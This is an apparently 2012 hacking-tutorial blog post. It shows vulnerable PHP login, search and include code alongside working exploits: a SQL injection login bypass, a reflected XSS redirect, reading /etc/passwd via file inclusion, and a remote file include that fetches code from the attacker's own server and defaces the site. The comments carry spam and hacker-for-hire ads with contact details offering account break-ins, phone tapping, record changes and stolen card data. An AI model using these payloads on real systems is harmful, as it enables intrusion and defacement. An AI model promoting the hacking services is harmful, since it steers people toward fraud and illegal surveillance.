Saturday, June 02, 2012
Unknown
Note: I believe you have some basic knowledge of HTML and PHP :)
Intended for educational purpose only...
SQL Injection
SQL injection is the act of injection your own, custom-crafted SQL commands into a
web-script so that you can manipulate the database any way you want. Some example usages of
SQL injection: Bypass login verification, add new admin account, lift passwords, lift
credit-card details, etc.; you can access anything that’s in the database.
Example Vulnerable Code – login.php (PHP/MySQL)
Here’s an example of a vulnerable login code
PHP Code:
php
$user = $_POST['u'];
$pass = $_POST['p'];
if (!isset($user) || !isset($pass)) {
echo(“<form method=post>
“);
} else {
$sql = “SELECT `IP` FROM `users` WHERE `username`=’$user’ AND `password`=’$pass’”;
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != “”) {
echo(“Welcome, $user.”);
} else {
echo(“Incorrect login details.”);
}
}
?>
Basically what this code does, is take the username and password input, and takes the
users’s IP from the database in order to check the validity of the username/password combo.
Testing Inputs For Vulnerability
Just throw an “‘” into the inputs, and see if it outputs an error; if so, it’s probably
injectable. If it doesn’t display anything, it might be injectable, and if it is, you will
be dealing with blind SQL injection which anyone can tell you is no fun. Else, it’s not
injectable.
The Example Exploit
Let’s say we know the admin’s username is Administrator and we want into his account. Since
the code doesn’t filter our input, we can insert anything we want into the statement, and
just let ourselves in. To do this, we would simply put “Administrator” in the username box,
and “‘ OR 1=1–” into the password box; the resulting SQL query to be run against the
database would be “SELECT `IP` FROM `users` WHERE `username`=’Administrator’ AND
`password=” OR 1=1–’”. Because of the “OR 1=1″, it will have the ability to ignore the
password requirement, because as we all know, the logic of “OR” only requires one question
to result in true for it to succeed, and since 1 always equals 1, it works; the “–” is the
‘comment out’ character for SQL which means it ignores everything after it, otherwise the
last “‘” would ruin the syntax, and just cause the query to fail.
XSS (Cross-Site Scripting)
This vulnerability allows for an attacker’s input to be sent to unsuspecting victims. The
primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie,
they can log into whatever site they stole your cookie from under your account (usually,
and assuming you were logged in at the time.)
Example Vulnerable Code – search.php (PHP)
PHP Code:
php
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo(“You searched for $s. There were no results found”);
?>
Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as “<font
color=red>XSS</font>”. If the site is vulnerable to XSS, you will see something like this:
XSS, else, it’s not vulnerable.
Example Exploit Code (Redirect)
Because we’re mean, we want to redirect the victim to goatse (don’t look that up if you
don’t know what it is) by tricking them into clicking on a link pointed to
“search.php?search=// “. This will output “You searched for // . There were no results
found” (HTML) and assuming the target’s browser supports JS (JavaScript) which all modern
browsers do unless the setting is turned off, it will redirect them to abc.
RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file, and have it parsed
and executed on the local server.
Example Vulnerable Code – index.php (PHP)
PHP Code:
<?php
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include(“home.php”);
}
?>
Testing Inputs For Vulnerability
Try visiting “index.php?p=http://www.google.com/”; if you see Google, it is vulnerable to
RFI and consequently LFI. If you don’t it’s not vulnerable to RFI, but still may be
vulnerable to LFI. Assuming the server is running *nix, try viewing
“index.php?p=/etc/passwd”; if you see the passwd file, it’s vulnerable to LFI; else, it’s
not vulnerable to RFI or LFI.
Example Exploit
Let’s say the target is vulnerable to RFI and we upload the following PHP code to our
server
PHP Code:
<?php
unlink(“index.php”);
system(“echo Hacked > index.php”);
?>
and then we view “index.php?p=http://our.site.com/malicious.php” then our malicious code
will be run on their server, and by doing so, their site will simply say ‘Hacked’ now.
Posted in: Learn Hacking,Website Hacking
13 comments:
Very Informative..
Woah! I'm really loving the template/theme of this blog. It's simple, yet
effective. A lot of times it's difficult to get that "perfect balance" between user friendliness and visual appearance. I must say you have done a fantastic job with this. Additionally, the blog loads super fast for me on Chrome. Outstanding Blog!
My weblog :: forgot twitter password
You have brought up a very excellent points , thanks for the
post.
my webpage: aimbots
Most of his songs are happily themed, a definite plus for any
exercise-motivating soundtrack. Besides rock, Hebden throws in elements from rap music,
jazz, as well as house music. Although Detroit is far
more famous for exporting cars rather than music, the vast array of
techno music genres we listen to today are variants on the original style of Detroit
Techno.
Also visit my web blog: daft punk random access memories flac free download
, Is Muscle Maximizer a sham or does it sincerely work.
To find out if it is actually true and to understand better if Kyle Leon's system is generally for you or not, let's look into a few of the benefits
and drawbacks of the product. Whenever upgrades became
ready you'll fully grasp this totally free no matter what quantity of money cost to establish them.
Look into my web-site - Somanabolic Muscle Maximizer Results
In addition, The Muscle Maximizer comes with a complete 9 week workout
program for you to follow so you now have everything you need to get started right away and achieve the level
of fitness you''. Many people wish to increase their lean muscle mass
and create your toned, developed body that is not
only aesthetically attractive, but strong and healthy additionally.
this program developer, Kyle Leon, is a well-known personal trainer and nutrition expert in recent years and is regarded as
one of the most respected coaches in the world when it comes
to building muscle mass naturally.
Here is my blog post; muscle maximizer results
In order to get a good and reliable hacker, it is advised you know first HOW TO HIRE A HACKER and how to know the hacker you should go for
hireverifiedhacker.wordpress.com
They are all scammers, they will make you pay after which they will give you an excuse asking you to pay more money, they have ripped me of $2000, i promised i was going to expose them.
I figured it all out when my colleague took me to Pavel
(HACKINTECHNOLOGY@GMAIL.COM)
CELL PHONE +16692252253
He did perfect job, he hacks all accounts ranging from (Emails, Facebook, whatsapp, imo, skype, instagram, Phone cloning, DMV removal, tracking locations, background checks Kik etc. he also hacks cell phones, cell phone tapping and cloning, clears bad driving and criminal records, bank transfers, locates missing individuals e.t.c. You should contact him and please stop using contacts you see on websites to execute jobs for you, you can ask around to find a real hacker.
My life was falling apart, I was being cheated and abused, I had to know the truth and needed proof. I contacted a private investigator that linked me with onlineghost who took care of the hack job. He hacked his iPhone,Facebook,Instagram, Whats app, twitter and email account. I got all I wanted as proof . I”m glad i had a proven truth he was cheating . Contact him for any hack job. Tell him i referred you to him, he will surely meet your hack need. Contact: onlineghosthacker247@ gmail .com
Thanks for sharing such an amazing article, really informative
Visit here : Hire professional Hackers
Thanks for sharing such an amazing article, really informative
Visit here : Unbeatable professional hackers
We are best when it comes to hacking.. Our services include: 1. School Grades Change 2. Drivers License 3. Hack email 4.
Database hack 5. Facebook, Whatsapp 6. Hack Call Logs, 7. Retrieve messages, deleted data and recovery of messages
on cell phone 8. Crediting , Money Transfer and other various activies 9. Sales of Dumps, Dead drops and fresh CC We
also sell high grades techs and hacking chips and gadgets if you are interested in Spying on anyone. We sell software,
apps for hacking service. Your security is 100% guaranteed and we have testimonies all around the world.We get your job done without any disappointment.
Interested parties
TEXT: 304 301 3832
email;Hackbone10 (@)GMAIL.COM
Do you need a hacker now? hackersforces is the best company for all. Where you can hire Online Unbeatable Professional Hackers for Cryptocurrency.Contact us.
visit here : Hire professional Hackers
Post a Comment